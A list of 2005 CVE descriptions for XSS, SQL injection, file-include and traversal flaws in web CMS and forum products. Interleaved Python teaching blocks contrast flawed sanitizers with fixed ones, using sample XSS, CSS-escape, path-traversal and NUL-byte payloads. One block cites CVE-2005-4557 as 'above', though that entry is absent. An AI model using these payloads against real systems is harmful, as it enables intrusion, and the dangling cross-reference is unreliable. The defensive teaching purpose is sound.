[CVE-2005-4515] ** DISPUTED ** SQL injection vulnerability in WebDB 1.1 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search parameters, possibly Search0. NOTE: the vendor has disputed this issue, saying that "WebDB is a generic online database system used by many of the clients of Lois Software. The flaw that was identified was some code that was added for a client to do some testing of his system and only certain safe commands were allowed. This code has now been removed and it is not now possible to use SQL queries as part of the query string. No installation or patch is required All clients use a common code library and have their own front end and databases and connections. So as soon as a change / upgrade / enhancement is made to the code, all users of the software begin to use the latest changes immediately." Since the issue appeared in a custom web site and no action is required on the part of customers, this issue should not be included in CVE.
[CVE-2005-4514] ** DISPUTED ** The encapsulation script mechanism in Webwasher CSM Appliance Suite 5.x uses case-sensitive detection of malicious tokens, which allows attackers to bypass script detection by using tokens that can be upper or lower case. NOTE: the vendor has stated that this problem could not be reproduced, and has asked the researcher for more information, without a response as of 20060103.
[CVE-2005-4513] Cross-site scripting (XSS) vulnerability in WANDSOFT e-SEARCH allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the keywords parameter.
[CVE-2005-4512] Cross-site scripting (XSS) vulnerability in WAXTRAPP 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4507] Multiple cross-site scripting (XSS) vulnerabilities in Nexus Concepts Dev Hound 2.24 and earlier allow remote attackers to inject arbitrary web script or HTML via multiple unspecified user input fields.
[CVE-2005-4502] Cross-site scripting (XSS) vulnerability in httprint v202, and possibly other versions before v301, allows remote attackers to inject arbitrary web script or HTML via the Server field in an HTTP response, which is not sanitized before being displayed to the user.
[CVE-2005-4498] Cross-site scripting (XSS) vulnerability in Text-e 1.6.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4497] Cross-site scripting (XSS) vulnerability in Tangora Portal CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the action parameter in a search page, as demonstrated using (1) page1631.aspx and (2) page496.aspx.
[CVE-2005-4496] Cross-site scripting (XSS) vulnerability in search in SyntaxCMS 1.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the search_query parameter.
[CVE-2005-4494] Cross-site scripting (XSS) vulnerability in SPIP 1.8.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) spip_login.php3 and (2) spip_pass.php3.
[CVE-2005-4493] Cross-site scripting (XSS) vulnerability in SpearTek 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4492] Cross-site scripting (XSS) vulnerability in Starphire SiteSage 5.0.18 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the norelay_highlight_words parameter.
[CVE-2005-4491] Multiple cross-site scripting (XSS) vulnerabilities in Sitekit CMS 6.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) query string, (2) textonly, (3) locID, and (4) lang parameters to (a) Default.aspx, and the (5) ClickFrom parameter to (b) Request-call-back.html and (c) registration-form.html. NOTE: the vendor states "This issue was resolved by a minor update to Sitekit CMS v6.6, sanitising the html code and eradicating related security issues."
[CVE-2005-4490] Multiple cross-site scripting (XSS) vulnerabilities in SCOOP! 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) keyword and (2) invalid parameter to articleSearch.asp
[CVE-2005-4489] Cross-site scripting (XSS) vulnerability in Scoop 1.1 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) type and (2) count parameters, and (3) the query string in a story.
[CVE-2005-4488] Multiple cross-site scripting (XSS) vulnerabilities in index.tpl in Redakto WCMS 3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) iid, (2) iid2, (3) r, (4) cart, (5) str, (6) nf, and (7) a parameters.
[CVE-2005-4487] Cross-site scripting (XSS) vulnerability in RAMSite R|1 CMS 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchfield parameter.
[CVE-2005-4485] Multiple cross-site scripting (XSS) vulnerabilities in ProjectApp 3.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the keywords parameter to (1) forums.asp, (2) search_employees.asp, (3) cat.asp, and (4) links.asp
[CVE-2005-4484] Multiple cross-site scripting (XSS) vulnerabilities in IntranetApp 3.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ret_page parameter to login.asp or the (2) do_search and (3) search parameters to content.asp.
[CVE-2005-4483] Cross-site scripting (XSS) vulnerability in login.asp in SiteEnable 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the ret_page parameter.
[CVE-2005-4482] Cross-site scripting (XSS) vulnerability in login.asp in PortalApp 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the ret_page parameter.
[CVE-2005-4481] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in Polopoly 9 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters. NOTE: the vendor has disputed this vulnerability, stating that the "XSS flaw was only part of the custom implementation of the [polopoly] site". As of 20061003, CVE has no further information on this issue, except that the original researcher has a history of testing live sites and assuming that discoveries indicate vulnerabilities in the associated package.
[CVE-2005-4480] Cross-site scripting (XSS) vulnerability in Plexcor CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4477] Cross-site scripting (XSS) vulnerability in papaya CMS 4.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the bab[searchfor] parameter.
[CVE-2005-4476] Cross-site scripting (XSS) vulnerability in store/search/results.html in OpenEdit 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) oe-action and (2) page parameters.
[CVE-2005-4475] Cross-site scripting (XSS) vulnerability in OpenCms 6.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4473] Unspecified vulnerability in Macromedia JRun 4 web server (JWS) allows remote attackers to view web application source code via "a malformed URL."
[CVE-2005-4472] Stack-based buffer overflow in the Macromedia JRun 4 web server (JWS) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long request that is not properly handled during conversion to wide characters.
[CVE-2005-4462] PHP remote file include vulnerability in usermods.php in Tolva PHP website system 0.1.0 allows remote attackers to execute arbitrary code via a URL in the ROOT parameter.
[CVE-2005-4460] Cross-site scripting (XSS) vulnerability in Beehive Forum 0.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Description, and (3) Comment fields to (a) links.php and (b) links_add.php.
[CVE-2005-4454] Validate-before-filter vulnerability in cleanhtml.pl 1.129 in LiveJournal CVS before Dec 7 2005, when the cleancss option is enabled, allows remote attackers to conduct cross-site scripting (XSS) attacks via a "\" (backslash) within a "javascript" scheme in a style property (such as "javas\cript"), which bypasses the "javascript" check before the "\" is stripped and then rendered in web browsers that allow scripting in style sheets.
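The ordering bug in CVE-2005-4454 (check for "javascript", then strip the "\" that hid it) is easy to reproduce on a toy CSS-value sanitizer. The block below is an added example and is not code from this listing or from LiveJournal's cleanhtml.pl; the function names, the escape-stripping rule and the sample payload are constructed for the demonstration. It shows the vulnerable order beside the filter-to-a-fixed-point-then-validate order.

```python
# Added example, not code from the vulscan/VulDB listing or from LiveJournal:
# a toy CSS-value sanitizer that reproduces the validate-before-filter ordering
# bug CVE-2005-4454 describes, next to a filter-then-validate version.
# Function names and the sample payload are constructed for this example.
import re
from typing import Optional

BLOCKED_SCHEME = "javascript"

# CSS treats "\" as an escape, so a browser that executes script from a style
# sheet reads "javas\cript:" as "javascript:".
SAMPLE_PAYLOAD = r"background:url(javas\cript:alert(1))"   # constructed


def strip_css_escapes(value: str) -> str:
    """Remove backslashes (and the ASCII control characters CSS also ignores)
    until the string stops changing, so layered tricks cannot survive."""
    current = value
    while True:
        step = re.sub(r"\\|[\x00-\x08\x0b\x0c\x0e-\x1f]", "", current)
        if step == current:
            return current
        current = step


def sanitize_style_vulnerable(value: str) -> Optional[str]:
    """Validate first, filter second: the check never sees the rendered form."""
    if BLOCKED_SCHEME in value.lower():
        return None                  # rejected
    return strip_css_escapes(value)  # "javas\cript" becomes "javascript" here


def sanitize_style_fixed(value: str) -> Optional[str]:
    """Filter to a fixed point, then validate exactly what will be rendered."""
    rendered = strip_css_escapes(value)
    if BLOCKED_SCHEME in rendered.lower():
        return None
    return rendered


if __name__ == "__main__":
    print("vulnerable:", sanitize_style_vulnerable(SAMPLE_PAYLOAD))
    print("fixed:     ", sanitize_style_fixed(SAMPLE_PAYLOAD))
```

The fixed-point loop matters: a single strip pass is enough for this payload, but a sanitizer that decodes or strips several layers (entities, percent-encoding, escapes) must validate the form that will actually reach the renderer, not an intermediate one.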
[CVE-2005-4452] Information Call Center stores the CallCenterData.mdb database under the web root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and passwords.
[CVE-2005-4446] Cross-site scripting (XSS) vulnerability in index.asp in ASPBite 8.x allows remote attackers to inject arbitrary web script or HTML via the strSearch parameter.
[CVE-2005-4435] Cross-site scripting (XSS) vulnerability in index.php in AbleDesign D-Man 3.x allows remote attackers to inject arbitrary web script or HTML via the title parameter. NOTE: the provenance of this information is unknown
[CVE-2005-4434] Cross-site scripting (XSS) vulnerability in AbleDesign ReSearch 2.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
[CVE-2005-4433] Cross-site scripting (XSS) vulnerability in search.php in Esselbach Storyteller CMS 1.8 allows remote attackers to inject arbitrary web script or HTML via the query parameter, which is used by the Search field.
[CVE-2005-4432] Cross-site scripting (XSS) vulnerability in index.php in PlaySMS 0.8 allows remote attackers to inject arbitrary web script or HTML via the err parameter.
[CVE-2005-4428] Cross-site scripting (XSS) vulnerability in index.php in Cerberus Helpdesk allows remote attackers to inject arbitrary web script or HTML via the kb_ask parameter.
[CVE-2005-4426] Interpretation conflict in YaBB before 2.1 allows remote authenticated users to inject arbitrary web script or HTML via HTML in a file with a GIF file extension, which causes the HTML to be executed by a victim who views the file in Internet Explorer as a result of CVE-2005-3312. NOTE: it could be argued that this vulnerability is due to a design flaw in Internet Explorer and the proper fix should be in that browser
[CVE-2005-4421] Dev-Editor 3.0 allows remote attackers to access any directory outside the web root whose name is a substring of the web root directory name.
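CVE-2005-4421 is a containment check done on strings: a directory is accepted when its name is a substring of the web root name, so "/", "/srv" and the root's parent all pass. The block below is an added example, not code from this listing, Dev-Editor or IceWarp; WEB_ROOT and the probe paths are constructed and nothing needs to exist on disk. It puts that reversed substring test and the "obvious" prefix test (which is also wrong) next to a canonical-path check, and the fixed check additionally refuses embedded NUL bytes, the truncation trick CVE-2005-4557 above describes for C-backed file APIs.

```python
# Added example, not code from the vulscan/VulDB listing, Dev-Editor or IceWarp:
# the string-containment checks behind CVE-2005-4421 (target is accepted when it
# is a substring of the web root) and the "obvious" prefix test that is also
# wrong, next to a canonical-path check. The fixed check also refuses embedded
# NUL bytes, the truncation trick CVE-2005-4557 describes for C-backed file APIs.
# WEB_ROOT and the request paths are constructed; nothing needs to exist on disk.
import os

WEB_ROOT = "/srv/www/htdocs"   # constructed


def is_inside_substring(web_root: str, requested: str) -> bool:
    """Reversed containment test of the CVE-2005-4421 kind: any directory whose
    name is a substring of the web root (/srv, /srv/www, /) counts as inside."""
    return requested in web_root


def is_inside_prefix(web_root: str, requested: str) -> bool:
    """Right direction, still wrong: siblings such as /srv/www/htdocs_old pass,
    and '..' segments are never normalised."""
    return requested.startswith(web_root)


def is_inside_fixed(web_root: str, requested: str) -> bool:
    """Canonicalise both sides (symlinks, '..', duplicate separators) and
    require the root to be a whole-component prefix of the target."""
    if "\x00" in requested:          # NUL would truncate the name in a C API
        return False
    root = os.path.realpath(web_root)
    # join() discards root when `requested` is absolute, so an absolute
    # escape is caught by the commonpath test instead of being silently allowed
    target = os.path.realpath(os.path.join(root, requested))
    try:
        return os.path.commonpath([root, target]) == root
    except ValueError:               # mixed absolute/relative or different drives
        return False


if __name__ == "__main__":
    for probe in ("/srv/www", "/srv/www/htdocs_old", "../../etc/passwd",
                  "img/../index.html", "index.html\x00.jpg"):
        print(repr(probe),
              is_inside_substring(WEB_ROOT, probe),
              is_inside_prefix(WEB_ROOT, probe),
              is_inside_fixed(WEB_ROOT, probe))
```

os.path.commonpath compares whole path components, which is what distinguishes /srv/www/htdocs from /srv/www/htdocs_old; a plain startswith on the canonical strings would still let the sibling through.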
[CVE-2005-4420] Cross-site scripting (XSS) vulnerability in Honeycomb Archive Enterprise 3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the keyword parameter in search.cfm.
[CVE-2005-4415] Cross-site scripting (XSS) vulnerability in index.php in TML CMS 0.5 allows remote attackers to inject arbitrary web script or HTML via the form parameter.
[CVE-2005-4413] Multiple cross-site scripting (XSS) vulnerabilities in sample scripts in IBM WebSphere Application Server 6 allow remote attackers to inject arbitrary web script or HTML via the (1) E-mail address field to (a) PlantsByWebSphere/login.jsp, (2) message field to (b) TechnologySample/BulletinBoard Script, (3) Email address field to (c) TechnologySamples/Subscription, and the (4) Movie Name, (5) Movie Reviewer, and (6) Movie Review fields to (d) TechnologySamples/MovieReview2_1.
[CVE-2005-4410] Cross-site scripting (XSS) vulnerability in NQcontent 3 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the text parameter.
[CVE-2005-4409] Cross-site scripting (XSS) vulnerability in MMBase 1.7.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4407] Cross-site scripting (XSS) vulnerability in index.cfm in Mercury CMS 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) content and (2) criteria parameters.
[CVE-2005-4401] Cross-site scripting (XSS) vulnerability in Lutece 1.2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the query parameter.
[CVE-2005-4400] Cross-site scripting (XSS) vulnerability in downloads/portal_ent in Liferay Portal Enterprise 3.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) _77_struts_action, (2) p_p_mode, and (3) p_p_state parameters.
[CVE-2005-4399] Cross-site scripting (XSS) vulnerability in search/index.php in Libertas Enterprise CMS 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the page_search parameter.
[CVE-2005-4398] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in lemoon 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the q parameter. NOTE: the vendor has disputed this issue, saying "Sites are built on top of ASP.NET and you use lemoon core objects to easily manage and render content. The XSS vuln. you are referring to exists in one of our public sites built on lemoon i.e. a custom made site (as all sites are). The problem exists in a UserControl that handles form input and is in no way related to the lemoon core product."
[CVE-2005-4396] Cross-site scripting (XSS) vulnerability in admin/Default.asp in iCMS allows remote attackers to inject arbitrary web script or HTML via the LoginMSG parameter. NOTE: the provenance of this issue is unknown
[CVE-2005-4395] Cross-site scripting (XSS) vulnerability in FarCry 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the criteria parameter.
[CVE-2005-4394] Cross-site scripting (XSS) vulnerability in EPiX 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search query parameters.
[CVE-2005-4393] Cross-site scripting (XSS) vulnerability in show.cfm in e-publish CMS 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) obcatid and (2) comid parameters.
[CVE-2005-4391] Cross-site scripting (XSS) vulnerability in damoon allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the q parameter.
[CVE-2005-4388] Cross-site scripting (XSS) vulnerability in search.cfm in CONTENS 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the near parameter.
[CVE-2005-4387] Cross-site scripting (XSS) vulnerability in home.php in contenite 0.11 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-4386] Cross-site scripting (XSS) vulnerability in Colony CMS 2.75 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4385] Cross-site scripting (XSS) vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
[CVE-2005-4383] Cross-site scripting (XSS) vulnerability in index.cfm in CitySoft Community Enterprise 4.x allows remote attackers to inject arbitrary web script or HTML via the (1) presentationSite, (2) docPublishYear, (3) docDescription, (4) publishState, (5) docAuthor, (6) docTitle, (7) subTopic, (8) topic, (9) topicRadio, (10) topicOnly, (11) startrow, and (12) sortby parameters.
[CVE-2005-4381] Multiple cross-site scripting (XSS) vulnerabilities in Caravel CMS 3.0 Beta 1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fileDN and (2) folderviewer_attrs parameters.
[CVE-2005-4379] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 1.1 and 1.1.1 beta allow remote attackers to inject arbitrary web script or HTML via the (1) sort_mode parameter to (a) fisheye/list_galleries.php, (b) messages/message_box.php, and (c) users/my.php
[CVE-2005-4377] Cross-site scripting (XSS) vulnerability in Page.asp in Baseline CMS 1.95 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) PageID and (2) SiteNodeID parameters.
[CVE-2005-4375] Cross-site scripting (XSS) vulnerability in Amaxus 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the change parameter. NOTE: it is possible that this is resultant from CVE-2005-4376.
[CVE-2005-4374] Multiple cross-site scripting (XSS) vulnerabilities in Allinta 2.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to faq.asp and (2) searchQuery parameter to search.asp.
[CVE-2005-4373] Adaptive Website Framework (AWF) 2.10 and earlier allows remote attackers to obtain the full path of the application via an invalid mode parameter to community.html, which leaks the path in an error message.
[CVE-2005-4372] Cross-site scripting (XSS) vulnerability in account.html in Adaptive Website Framework (AWF) 2.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2005-4371] Acidcat 2.1.13 and earlier stores the database under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a request to databases/acidcat.mdb.
[CVE-2005-4369] Cross-site scripting (XSS) vulnerability in Acuity CMS 2.6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly strSearchKeywords to browse.asp.
[CVE-2005-4368] roundcube webmail Alpha, with a default high verbose level ($rcmail_config['debug_level'] = 1), allows remote attackers to obtain the full path of the application via an invalid_task parameter, which leaks the path in an error message.
[CVE-2005-4367] Cross-site scripting (XSS) vulnerability in register_domain.php in DRZES HMS 3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly the "Domain Availability" field. NOTE: this issue was later reported to affect CONTROLzx (renamed from DRZES) 3.3.4.
[CVE-2005-4365] Multiple cross-site scripting (XSS) vulnerabilities in FLIP 0.9.0.1029 allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter in text.php and (2) frame parameter in forum.php.
[CVE-2005-4364] Cross-site scripting (XSS) vulnerability in index.cfm in Hot Banana Web Content Management Suite 5.3 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2005-4363] Cross-site scripting (XSS) vulnerability in the search engine in Komodo CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters.
[CVE-2005-4361] Cross-site scripting (XSS) vulnerability in search.html in Magnolia Content Management Suite 2.1 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2005-4355] Multiple cross-site scripting (XSS) vulnerabilities in UStore allow remote attackers to inject arbitrary web script or HTML via the (1) Cat parameter in default.asp and the (2) accessdenied parameter in admin/default.asp. NOTE: the provenance of this information is unknown
[CVE-2005-4354] Cross-site scripting (XSS) vulnerability in webglimpse.cgi in Webglimpse 2.14.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2005-4339] Cross-site scripting (XSS) vulnerability in Blackboard Learning and Community Portal System in Academic Suite 6.3.1.424, 6.2.3.23, and other versions before 6 allows remote attackers to inject arbitrary web script or HTML via the context parameter to announcement.pl, which is reflected in the resulting page.
[CVE-2005-4336] Cross-site scripting (XSS) vulnerability in ProjectForum 4.7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) fwd parameter in admin/adminsignin.html and (2) originalpageid parameter in admin/newpage.html associated with a group.
[CVE-2005-4333] Multiple cross-site scripting (XSS) vulnerabilities in Binary Board System (BBS) 0.2.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) inreplyto, (2) article, and (3) board parameters to reply.pl, (4) branch, (5) board, and (6) stats.pl parameters to (b) stats.pl, and (7) board parameter to (c) toc.pl.
[CVE-2005-4328] Cross-site scripting (XSS) vulnerability in webglimpse.cgi in Webglimpse 2.14.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
[CVE-2005-4327] Multiple cross-site scripting (XSS) vulnerabilities in Michael Arndt WebCal 1.11-3.04 allow remote attackers to inject arbitrary web script or HTML via the (1) function, (2) year, and (3) date parameters to webcal.cgi, (4) new calendar entries, and (5) notes for entries.
[CVE-2005-4323] Unspecified vulnerability in Hitachi Cosminexus Collaboration Portal 06-00 through 06-10-/B, Groupmax Collaboration Portal 07-00 through 07-10-/B, and Groupmax Collaboration Web Client 07-00 through 07-10-/A allow remote attackers to cause a denial of service of unspecified impact via repeated invalid requests to the Schedule component.
[CVE-2005-4322] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Cosminexus Collaboration Portal 06-00 through 06-10-/B, Groupmax Collaboration Portal 07-00 through 07-10-/B, and Groupmax Collaboration Web Client 07-00 through 07-10-/A allow remote attackers to inject arbitrary web script or HTML via the (1) Schedule and (2) Calendar components.
[CVE-2005-4314] Cross-site scripting (XSS) vulnerability in ppcal.cgi in PPCal Shopping Cart 3.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) stop and (2) user parameters.
[CVE-2005-4311] Cross-site scripting (XSS) vulnerability in DCForum 6.25 and earlier, and possibly DCForum+ 1.x, allows remote attackers to inject arbitrary web script or HTML via (1) the page parameter in dcboard.php and (2) unspecified search parameters.
[CVE-2005-4307] Cross-site scripting (XSS) vulnerability in ScareCrow 2.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the forum parameter to (1) forum.cgi and (2) post.cgi, or (3) the user parameter to profile.cgi.
[CVE-2005-4306] Multiple cross-site scripting (XSS) vulnerabilities in SiteNet BBS 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pg, (2) tid, (3) cid, and (4) fid parameters to netboardr.cgi, or (5) cid parameter to search.cgi.
[CVE-2005-4305] Cross-site scripting (XSS) vulnerability in Edgewall Trac 0.9, 0.9.1, and 0.9.2 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly sanitized before it is returned in an error page.
[CVE-2005-4301] Cross-site scripting (XSS) vulnerability in phpXplorer 0.9.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the address bar field.
[CVE-2005-4299] Cross-site scripting (XSS) vulnerability in atl.cgi in Atlant Pro 4.02 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) before and (2) ct parameters.
[CVE-2005-4298] Cross-site scripting (XSS) vulnerability in atl.cgi in AtlantForum 4.02 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) sch_allsubct, (2) before, and (3) ct parameters.
[CVE-2005-4297] Cross-site scripting (XSS) vulnerability in bbBoard 2.56 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search parameters, possibly via the "keys" parameter.
[CVE-2005-4295] Cross-site scripting (XSS) vulnerability in Absolute Image Gallery XE 2.x allows remote attackers to inject arbitrary web script or HTML via the text parameter. NOTE: the provenance of this information is unknown
[CVE-2005-4294] Cross-site scripting (XSS) vulnerability in Alkacon OpenCms before 6.0.3 allows remote attackers to inject arbitrary web script or HTML via the username in the login page.
[CVE-2005-4293] Cross-site scripting (XSS) vulnerability in cp-app.cgi in ClickCartPro (CCP) 5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the affl parameter.
[CVE-2005-4292] Cross-site scripting (XSS) vulnerability in CommerceSQL 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the keywords parameter in the Quick Find feature.
[CVE-2005-4291] Cross-site scripting (XSS) vulnerability in cart.cgi in ECTOOLS Onlineshop 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) product, (2) category, and (3) uid parameters.
[CVE-2005-4290] Cross-site scripting (XSS) vulnerability in index.cgi in ECW-Cart 2.03 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) kword, (2) max, (3) min, (4) comp, and (5) f parameters.
[CVE-2005-4289] Cross-site scripting (XSS) vulnerability in EDCstore.pl in eDatCat 0.3 allows remote attackers to inject arbitrary web script or HTML via the user_action parameter.
[CVE-2005-4288] Cross-site scripting (XSS) vulnerability in index.php in MarmaraWeb E-commerce allows remote attackers to inject arbitrary web script or HTML via the page parameter to index.php. NOTE: this might be resultant from CVE-2005-4287.
[CVE-2005-4287] PHP remote file include vulnerability in MarmaraWeb E-commerce allows remote attackers to execute arbitrary code via the page parameter to index.php.
[CVE-2005-4285] Cross-site scripting (XSS) vulnerability in pdestore.cgi in Dick Copits PDEstore 1.8 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the search module parameter or the (2) product and (3) cart_id parameters.
[CVE-2005-4284] Cross-site scripting (XSS) vulnerability in StaticStore Search Engine 1.189A and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters to search.cgi, possibly the keywords parameter. NOTE: this issue was originally disputed by the vendor, but it has since been acknowledged.
[CVE-2005-4283] Cross-site scripting (XSS) vulnerability in The CITY Shop 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via parameters to the search module, possibly SKey to store.cgi.
[CVE-2005-4282] Cross-site scripting (XSS) vulnerability in Zaygo DomainCart 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML, possibly via the root parameter to zaygo.cgi.
[CVE-2005-4281] Cross-site scripting (XSS) vulnerability in Zaygo HostingCart 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via certain search module parameters, possibly the root parameter to zaygo.cgi.
[CVE-2005-4277] Cross-site scripting (XSS) vulnerability in index.php in toendaCMS before 0.7 Beta allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2005-4274] Unspecified vulnerability in Business Objects WebIntelligence 6.5x allows remote attackers to cause a denial of service (user account lock out) via unknown attack vectors related to "authentication mechanisms" and "form input."
[CVE-2005-4270] Buffer overflow in Watchfire AppScan QA 5.0.609 and 5.0.134 allows remote web servers to execute arbitrary code via an HTTP 401 response with a WWW-Authenticate header containing a long Realm field.
[CVE-2005-4262] Cross-site scripting (XSS) vulnerability in the News module in Envolution allows remote attackers to inject arbitrary web script or HTML via the (1) startrow and (2) catid parameter. NOTE: this issue might be resultant from the SQL injection problem (CVE-2005-4263).
[CVE-2005-4260] Interpretation conflict in includes/mainfile.php in PHP-Nuke 7.9 and later allows remote attackers to perform cross-site scripting (XSS) attacks by replacing the ">" in the tag with a "<", which bypasses the regular expressions that sanitize the data, but is automatically corrected by many web browsers. NOTE: it could be argued that this vulnerability is due to a design limitation of many web browsers
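CVE-2005-4260 (a "<" in place of the closing ">" slips past the tag regex) and CVE-2005-4514 above (case-sensitive token matching) are the same failure: a blocklist that must predict how a browser will repair malformed markup. The block below is an added example, not code from this listing, PHP-Nuke or Webwasher; the regex and the probe strings are constructed to have the shape those entries describe. It shows which probes survive the blocklist and that output escaping neutralises all of them without needing to recognise any of them.

```python
# Added example, not code from the vulscan/VulDB listing or from PHP-Nuke /
# Webwasher: a blocklist regex of the shape CVE-2005-4260 and CVE-2005-4514
# describe (recognises only a well-formed, lower-case <script ...> opener),
# next to output escaping. The regex and the probe strings are constructed.
import html
import re

# Case-sensitive, and needs a '>' to end the tag: a '<' where the '>' should be
# is not a tag to this regex, although the CVE says browsers of the time
# corrected it into one.
NAIVE_SCRIPT_RE = re.compile(r"<script\b[^<>]*>")


def blocklist_sanitize(fragment: str) -> str:
    """Blocklist approach: delete what the regex recognises, pass the rest."""
    return NAIVE_SCRIPT_RE.sub("", fragment)


def escape_for_html(fragment: str) -> str:
    """Allowlist approach: nothing from the user is ever interpreted as markup."""
    return html.escape(fragment, quote=True)


def opener_survives(sanitised: str) -> bool:
    """True when a '<script' opener (any case) is still present after sanitising."""
    return "<script" in sanitised.lower()


PROBES = {                                             # constructed
    "well_formed": "<script>alert(1)</script>",
    "mixed_case": "<ScRiPt>alert(1)</ScRiPt>",         # the CVE-2005-4514 shape
    "lt_for_gt":  "<script<alert(1)</script>",         # the CVE-2005-4260 shape
}


def bypass_report() -> dict:
    """Which probes keep their opener after the blocklist has run."""
    return {name: opener_survives(blocklist_sanitize(p)) for name, p in PROBES.items()}


if __name__ == "__main__":
    for name, survived in bypass_report().items():
        print(f"{name:12s} blocklist bypassed: {survived}")
    for name, probe in PROBES.items():
        print(f"{name:12s} escaped:            {escape_for_html(probe)}")
```

Adding (?i) and tolerating a stray "<" would close these two probes and leave every other parser-repair quirk open; escaping at the output boundary does not depend on enumerating them.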
[CVE-2005-4256] Cross-site scripting (XSS) vulnerability in forum.asp in ASP-DEV XM Forum RC3 allows remote attackers to inject arbitrary web script or HTML via the forum_title parameter. NOTE: the provenance of this issue is unknown
[CVE-2005-4255] Cross-site scripting (XSS) vulnerability in TextSearch in WikkaWiki 1.1.6.0 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded phrase parameter.
[CVE-2005-4253] Cross-site scripting (XSS) vulnerability in getdox.php in Torrential 1.2 allows remote attackers to inject arbitrary web script or HTML via the URL. NOTE: this might be resultant from CVE-2005-4160.
[CVE-2005-4252] Cross-site scripting (XSS) vulnerability in mcGallery PRO 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters.
